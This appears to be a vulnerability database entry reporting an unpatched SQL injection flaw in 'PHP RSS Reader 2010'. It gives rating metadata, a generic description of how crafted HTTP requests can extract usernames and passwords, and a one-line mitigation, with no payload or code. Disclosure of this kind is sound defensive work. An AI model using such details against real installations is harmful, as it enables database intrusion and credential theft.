Vendor: PHP RSS Reader 2010
By: rDNix
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: PHP RSS Reader 2010
Affected Version From: 2010
Affected Version To: 2010
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013
[PHP RSS READER 2010 SQLI]
A SQL injection vulnerability exists in the PHP RSS Reader 2010 application. An attacker can exploit this vulnerability to gain access to the application's database and extract sensitive information such as usernames and passwords. The vulnerability is due to the application not properly sanitizing user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This will cause the application to execute the malicious SQL statements and return the results of the query.
Mitigation:
To mitigate this vulnerability, the application should properly sanitize user-supplied input before using it in an SQL query.